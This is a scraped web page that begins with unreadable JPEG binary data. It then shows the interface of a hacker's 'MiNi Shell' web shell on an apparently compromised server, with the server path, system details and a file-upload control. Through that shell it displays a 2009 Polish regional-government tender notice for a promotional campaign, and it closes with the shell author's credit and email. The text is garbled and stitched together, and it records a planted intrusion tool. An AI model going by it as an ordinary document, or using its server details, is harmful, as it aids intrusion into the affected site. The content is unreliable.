JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090326/79068-N-2009.html

<p class="kh_header"><b>Szczecin: Przygotowanie i przeprowadzenie kampanii promocyjnej przy wykorzystaniu form niestandardowych - Dni Województwa Zachodniopomorskiego 2009 w Katowicach</b><br>
<b>Numer ogłoszenia: 79068 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Zachodniopomorskie-Urząd Marszałkowski Województwa Zachodniopomorskiego , ul. Korsarzy 34, 70-540 Szczecin, woj. zachodniopomorskie, tel. 091 44 67 120, faks 091 4893976.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um-zachodniopomorskie.pl/przetargi.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie kampanii promocyjnej przy wykorzystaniu form niestandardowych - Dni Województwa Zachodniopomorskiego 2009 w Katowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Podstawowe założenia do wykonania kampanii promocyjnej przy wykorzystaniu form niestandardowych - Dni Województwa Zachodniopomorskiego 2009 w Katowicach:

1)	Promocja dot. Dni Województwa Zachodniopomorskiego 2009 musi być zgodna z następującymi założeniami:
Termin: Promocja Dni Województwa Zachodniopomorskiego ma się odbywać w terminie od dnia 15 maja do dnia 24 maja 2009 roku.
Miejsce: Promocja Dni Województwa Zachodniopomorskiego 2009 ma objąć swoim zasięgiem obszar ścisłego centrum miasta Katowic, ograniczonego ulicami: Dworcową, Jana Matejki, Placu Wolności, Sokolską, Chorzowską, Walentego Roździeńskiego, Bankową, Warszawską, Francuską, Mariacką.
Zakres: przygotowanie i przeprowadzenie kampanii promocyjnej przy wykorzystaniu form niestandardowych (ambient) 

Uszczegółowienie: 
2)	wybrane formy niestandardowe powinny byc charakterystyczne dla obszaru nadmorskiego 
i kojarzone z pobytem i wypoczynkiem nad morzem,
3)	powinny wzbudzać zainteresowanie przechodniów i zachęcać do odwiedzenia ulicy Mariackiej podczas trwania imprezy Dni Województwa Zachodniopomorskiego (22 - 24 maja 2009), jednocześnie nie zdradzając szczegółów oraz formy samego eventu,
4)	powinny zawierać elementy innowacyjności i być widoczne (duże), 
5)	wszędzie powinno być widoczne logo Województwa Zachodniopomorskiego oraz miejsce i czas odbywania się imprezy,
6)	Wykonawca musi również posiadać warunki, możliwości oraz wszystkie niezbędne pozwolenia do wykonania w całości kampanii promocyjnej Dni Województwa Zachodniopomorskiego 2009,
7)	Wykonawca musi zapewnić obsługę techniczną i ochronę obiektów, wchodzących w skład kampanii podczas ww. okresu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.40.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia publicznego mogą się ubiegać Wykonawcy spełniający warunki wymienione w art. 22 ustawy Prawo zamówień publicznych.
2.	O udzielenie zamówienia publicznego ubiegać się mogą Wykonawcy niewykluczeni z postępowania na  podstawie art. 24 ustawy Prawo zamówień publicznych. 
3.	Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie minimum 3 zamówienia polegające na wykonaniu kampanii promocyjnej dla produktu, podmiotu lub imprezy wraz ze wskazaniem wartości zamówienia nie mniejszej niż 30 000,00 zł brutto.(Formularz nr 2) Wykonawcy wspólnie ubiegający się o udzielnie niniejszego zamówienia muszą wykazać, że łącznie  spełniają powyższy warunek szczegółowy.

Ocena spełniania powyższych warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy dokumentów i oświadczeń załączonych do wniosku o dopuszczenie do udziału w dialogu na zasadzie: spełnia / nie spełnia. Oznacza to, że brak wykazania we wniosku spełnienia któregokolwiek z wymaganych warunków lub któregokolwiek z dokumentów spowoduje wykluczenie wykonawcy.
W przypadku warunku dotyczącego posiadanego doświadczenia, zamawiający będzie stosował następujące zasady przydzielania punktów:
Doświadczenie wykonawcy: 
-	realizacja 1 zamówienia o podobnym charakterze - 1 pkt
-	wartość zrealizowanego lub realizowanego projektu, każde 30 000 zł powyżej minimum - 1 pkt

Zamawiający zaprosi do dialogu pięciu wykonawców, którzy spełniają warunki udziału w postępowaniu. Jeżeli liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż 5 Zamawiający zaprosi do dialogu tych wykonawców, którzy w toku oceny złożonych wniosków otrzymają najwyższą ocenę spełniania warunku doświadczenia.
Jeżeli w wyniku oceny doświadczenia wykonawców okaże się, że kilku wykonawców otrzymało taką samą ilość pkt, to elementem decydującym o zakwalifikowaniu do następnego etapu będzie wykonanie największej ilości prac podobnych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy mają dostarczyć następujące dokumenty i oświadczenia:
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosku;
2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu (formularz nr 1);
3.	Wykaz wykonanych/wykonywanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie minimum 3 zamówień polegających na wykonaniu kampanii promocyjnej dla produktu, podmiotu lub imprezy wraz ze wskazaniem wartości zamówienia nie mniejszej niż 30 000,00 zł brutto oraz z dokumentami potwierdzającymi należytą realizację wymienionych prac (Formularz nr 2). Wykonawcy wspólnie ubiegający się o udzielnie niniejszego zamówienia muszą wykazać, że łącznie  spełniają powyższy warunek szczegółowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Ocena projektu - 60</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um-zachodniopomorskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Organizacji i Rozwoju Zasobów Ludzkich, Wieloosobowe Stanowisko ds. Zamówień Publicznych, ul. Piłsudskiego 40-42, 70-421 Szczecin.</p>
<p><b>IV.3.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> 1)	Promocja dot. Dni Województwa Zachodniopomorskiego 2009 musi być zgodna z następującymi założeniami:
Termin: Promocja Dni Województwa Zachodniopomorskiego ma się odbywać w terminie od dnia 15 maja do dnia 24 maja 2009 roku.
Miejsce: Promocja Dni Województwa Zachodniopomorskiego 2009 ma objąć swoim zasięgiem obszar ścisłego centrum miasta Katowic, ograniczonego ulicami: Dworcową, Jana Matejki, Placu Wolności, Sokolską, Chorzowską, Walentego Roździeńskiego, Bankową, Warszawską, Francuską, Mariacką.
Zakres: przygotowanie i przeprowadzenie kampanii promocyjnej przy wykorzystaniu form niestandardowych (ambient) 

Uszczegółowienie: 
2)	wybrane formy niestandardowe powinny byc charakterystyczne dla obszaru nadmorskiego 
i kojarzone z pobytem i wypoczynkiem nad morzem,
3)	powinny wzbudzać zainteresowanie przechodniów i zachęcać do odwiedzenia ulicy Mariackiej podczas trwania imprezy Dni Województwa Zachodniopomorskiego (22 - 24 maja 2009), jednocześnie nie zdradzając szczegółów oraz formy samego eventu,
4)	powinny zawierać elementy innowacyjności i być widoczne (duże), 
5)	wszędzie powinno być widoczne logo Województwa Zachodniopomorskiego oraz miejsce i czas odbywania się imprezy,
6)	Wykonawca musi również posiadać warunki, możliwości oraz wszystkie niezbędne pozwolenia do wykonania w całości kampanii promocyjnej Dni Województwa Zachodniopomorskiego 2009,
7)	Wykonawca musi zapewnić obsługę techniczną i ochronę obiektów, wchodzących w skład kampanii podczas ww. okresu..</p><p><b>IV.3.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje przyznawania wykonawcom nagród określonych w art. 60c ust. 1 pkt 2 ustawy Prawo Zamówień Publicznych.</p><p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2009 godzina 11:00, miejsce: WOiRZL - II Wieloosobowego Stanowiska ds. Zamówień Publicznych Urzędu Marszałkowskiego Województwa Zachodniopomorskiego w Szczecinie ul. Piłsudskiego 40-42, 70 - 421 Szczecin pok. 312.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com